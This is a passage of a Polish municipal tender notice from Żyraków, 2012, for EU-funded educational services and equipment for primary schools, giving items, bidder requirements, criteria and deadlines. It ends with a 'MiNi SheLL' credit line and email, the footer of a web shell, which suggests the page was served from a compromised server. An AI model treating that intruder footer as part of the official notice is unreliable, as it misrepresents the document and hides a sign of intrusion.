- Zestaw piłek Eduball (piłki, które rozwijają umiejętności z zakresu prostych działań matematycznych oraz zapoznają z podstawowymi zagadnieniami języka polskiego. 
Uczą praktycznego wykorzystania zdobytej wiedzy, twórczego myślenia oraz motywują do aktywności ruchowe. Zestaw piłek edubal składa się z: 70 piłek do koszykówki w rozmiarze 3 z nadrukowanymi literkami oraz cyferkami,20 piłek do siatkówki z nadrukowanymi znakami matematycznymi oraz interpunkcyjnymi,
4 standardowych mini-piłek sportowych do koszykówki, siatkówki, piłki nożnej oraz 
ręcznej,2 siatek do przechowywania piłek,2 nowoczesnych pompek do piłek 
MICROQUICKER,książka 100 gier i zabaw ruchowych z wykorzystaniem piłek edubal) lub równoważne - 1szt,- Ortograffiti z Bratkiem (program wsparcia uczniów ryzyka dysleksji lub mających trudności w nauce czytania i pisania) lub równoważne - 4szt,
- Program Czytam i piszę - interaktywna nauka języka polskiego (pasjonująca 
interaktywna gra edukacyjna dla dzieci w wieku 6-10 lat, kształcąca umiejętność 
czytania i pisania. Program wprowadzający dziecko w świat emocjonującej przygody z literkami, dzięki której nauczy się płynnie i ze zrozumieniem czytać oraz przyswajać 
sobie reguły poprawnego pisania) lub równoważne - 1szt,
- Waga wisząca do 5kg (waga na zajęcia matematyczne do ważenia różnych rzeczy. 
Wskaźnik wagowy od 0 do 5000 g) - 1szt,
- Koło Miarka (koło, które pozwala na mierzenie długości pokonanego dystansu. Licznik zamocowany na kole dokładnie wskazuje dzieciom pomiar długości) lub równoważne - 1szt,
- Zestaw Liczę w pamięci (zbiór zadań dotyczących 4 podstawowych działań arytmetycznych. Służą poznawaniu podstaw techniki rachunkowej, utrwaleniu pojęcia liczby oraz doskonaleniu umiejętności symbolicznego zapisu działań) lub równoważne - 1szt,
6.Doposażenie bazy dydaktycznej w SP Wiewiórka:
- Zestaw piłek Eduball (piłki, które rozwijają umiejętności z zakresu prostych działań matematycznych oraz zapoznają z podstawowymi zagadnieniami języka polskiego. 
Uczą praktycznego wykorzystania zdobytej wiedzy, twórczego myślenia oraz motywują do aktywności ruchowe. Zestaw piłek edubal składa się z: 70 piłek do koszykówki w rozmiarze 3 z nadrukowanymi literkami oraz cyferkami, 20 piłek do siatkówki z nadrukowanymi znakami matematycznymi oraz interpunkcyjnymi,
4 standardowych mini-piłek sportowych do koszykówki, siatkówki, piłki nożnej oraz 
ręcznej,2 siatek do przechowywania piłek, 2 nowoczesnych pompek do piłek 
MICROQUICKER,książka 100 gier i zabaw ruchowych z wykorzystaniem piłek edubal) lub równowazne - 1szt,
- Ortograffiti z Bratkiem(program wsparcia uczniów ryzyka dysleksji lub mających 
trudności w nauce czytania i pisania) lub równoważne - 1szt,
- Ćwiczenia grafomotoryczne - zestaw - 1szt
7. Doposażenie bazy dydaktycznej w SP Zasów :
- Program multimedialny Klik uczy wraz ćwiczeniami - 1szt,
- Zestaw do zajęć z gimnastyki korekcyjnej (maty, ławeczki, lustra, hula hop) 
- 1 zestaw.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-0, 80.31.00.00-0, 80.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedłoży podpisane przez osoby uprawnione oświadczenie na załączniku nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje, że brał czynny udział w realizacji lub współrealizacji projektów finansowanych lub współfinansowanych przez Unię Europejską w okresie poprzedzającym upływ terminu składania ofert, w których przedmiotem realizacji były usługi o charakterze podobnym rodzajowo do przedmiotu zamówienia, tj. podlegające pod kody CPV 80100000-5 - 80660000-8 - usługi edukacyjne lub szkoleniowe, a wartość jednego z tych projektów wynosiła co najmniej 100 tyś zł brutto. Kryterium oceny stanowi łączna ilość (liczba) projektów, która zostanie poddana ocenie (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1b SIWZ,

Wykonawca udokumentuje, że posiada doświadczenie w realizacji usługi podobnej rodzajowo do przedmiotu zamówienia, która w żadnej części nie była finansowana z środków pochodzących z Unii Europejskiej w okresie poprzedzającym upływ terminu składania ofert, gdzie przedmiotem wykonania były usługi o charakterze podobnym rodzajowo do przedmiotu zamówienia, tj. podlegające pod kody CPV 80100000-5 - 80660000-8 - usługi edukacyjne lub szkoleniowe. Wartość poszczególnych usług nie stanowi kryterium oceny; oceniany jest łączny czas trwania tych usług* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1b SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedłoży podpisane przez osoby uprawnione oświadczenie na załączniku nr 2</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedłoży oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy potwierdzające, że posiadają one wykształcenie kierunkowe właściwe dla świadczonej usługi (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c SIWZ, oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy potwierdzające, że odbyli Oni przeszkolenie z zasad postępowania z dziećmi ze szkół podstawowych  w zakresie prowadzenia zajęć edukacyjnych z zakresu przedmiotu zamówienia, uprawdopodobniające że Wykonawca daje rękojmię należytego wykonania zamówienia, (np. certyfikat, zaświadczenie od podmiotu przeprowadzającego przeszkolenie, szkolenie, kurs lub równoważne zajęcia w tym zakresie) (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c SIWZ, oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy - jeśli osoby te dysponują potwierdzeniem odbycia tego typu przeszkolenia, potwierdzające, że odbyli Oni przeszkoleni w zakresie równości szans - zasada równości szans kobiet i mężczyzn (np. certyfikat, zaświadczenie od podmiotu przeprowadzającego przeszkolenie, szkolenie, kurs lub równoważne zajęcia w tym zakresie) (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedłoży podpisane przez osoby uprawnione oświadczenie na załączniku nr 2</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy
2. Pełnomocnictwo do reprezentowania wykonawcy w postępowaniu, z którego wynika jego zakres, podpisane przez osoby uprawnione do reprezentowania Wykonawcy (jeżeli wykonawca jest reprezentowany przez pełnomocnika lub jeżeli istnieje ustawowy obowiązek ustanowienia pełnomocnika - jak w punkcie X i XI SIWZ). Uwaga: Pełnomocnictwo powinno być przedstawione w oryginale lub kserokopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 30</li>
<li>3 - Kwalifikacje - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość przesunięcia terminu wykonania umowy w wypadku, gdyby nastąpiły opóźnienia związane z realizacją założeń projektowych, wynikające z przyczyn leżących po stronie Zamawiającego lub Instytucji Pośredniczącej tj. WUP w Rzeszowie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zyrakow.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Żyrakowie, 39-204 Żyraków 137, pokój nr 2 (parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.01.2012 godzina 10:00, miejsce: Urząd Gminy w Żyrakowie, 39-204 Żyraków 137, pokój nr 21 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez  Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, 

9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty,
9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup  o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com